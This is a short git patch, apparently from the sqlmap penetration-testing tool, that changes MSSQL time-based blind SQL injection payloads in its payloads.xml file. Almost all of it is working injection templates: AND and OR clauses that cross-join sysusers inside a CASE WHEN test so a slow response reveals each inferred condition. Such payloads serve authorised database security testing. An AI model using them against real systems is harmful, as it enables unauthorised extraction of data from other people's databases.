From 36a7fca8d592a9943a80372903ca45d7be70d9b7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 7 Dec 2010 12:06:25 +0000 Subject: [PATCH] added time-based payload vector for MSSQL --- xml/payloads.xml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/xml/payloads.xml b/xml/payloads.xml index 3e053901d..9c7a30acd 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1523,8 +1523,9 @@ Formats: 1 1,2,3 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) - AND (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0 + AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) @@ -1681,8 +1682,9 @@ Formats: 3 1,2,3 2 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) - OR (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0 + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)